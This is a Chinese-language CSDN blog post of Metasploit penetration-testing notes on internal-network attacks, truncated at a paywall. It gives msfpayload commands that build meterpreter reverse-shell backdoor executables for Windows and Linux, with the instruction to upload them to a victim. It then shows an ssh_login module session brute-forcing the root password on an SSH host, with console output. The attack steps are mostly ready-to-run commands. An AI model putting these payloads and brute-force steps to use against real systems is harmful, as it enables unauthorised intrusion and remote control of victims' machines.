metasploit渗透测试笔记(内网渗透篇)

最新推荐文章于 2024-04-27 15:00:00 发布

「已注销」

最新推荐文章于 2024-04-27 15:00:00 发布

阅读量1.2w

点赞数 2

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/h4ck0ne/article/details/50570767

版权

x01 reverse the shell

File

通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。

reverse_tcp/http/https => exe => victim => shell

reverse_tcp

windows:

msfpayload windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

Linux(x86)

msfpayload linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> R | msfencode -t elf -o shell

reverse_http

msfpayload windows/meterpreter/reverse_http LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

reverse_https

msfpayload windows/meterpreter/reverse_https LHOST=<Your IP Address> LPORT=<Your Port to Connect On> X > shell.exe

Login privilege

在获得一些登陆权限之后获得meterpreter shell的方法。

SSH

ssh_login

模块路径:auxiliary/scanner/ssh/ssh_login

msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login) > show options

Module options (auxiliary/scanner/ssh/ssh_login):

Name Current Setting Required Description

---- --------------- -------- -----------

BLANK_PASSWORDS true no Try blank passwords for all users

BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5

DB_ALL_CREDS false no Try each user/password couple stored in the current database

DB_ALL_PASS false no Add all passwords in the current database to the list

DB_ALL_USERS false no Add all users in the current database to the list

PASSWORD no A specific password to authenticate with

PASS_FILE no File containing passwords, one per line

RHOSTS yes The target address range or CIDR identifier

RPORT 22 yes The target port

STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host

THREADS 1 yes The number of concurrent threads

USERNAME no A specific username to authenticate as

USERPASS_FILE no File containing users and passwords separated by space, one pair per line

USER_AS_PASS true no Try the username as the password for all users

USER_FILE no File containing usernames, one per line

VERBOSE true yes Whether to print output for all attempts

msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104

RHOSTS => 192.168.1.104

msf auxiliary(ssh_login) > set USERNAME root

USERNAME => root

msf auxiliary(ssh_login) > set PASS

set PASSWORD set PASS_FILE

msf auxiliary(ssh_login) > set PASSWORD toor

PASSWORD => toor

msf auxiliary(ssh_login) > exploit

[*] 192.168.1.104:22 SSH - Starting bruteforce

[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: ''

[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':''

[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root'

[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root'

最低0.47元/天解锁文章

「已注销」

关注

2
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
metasploit渗透测试笔记(内网渗透篇)

x01 reverse the shell File通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shellreverse_tcp windows:msfpayload windows/mete
复制链接

扫一扫

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。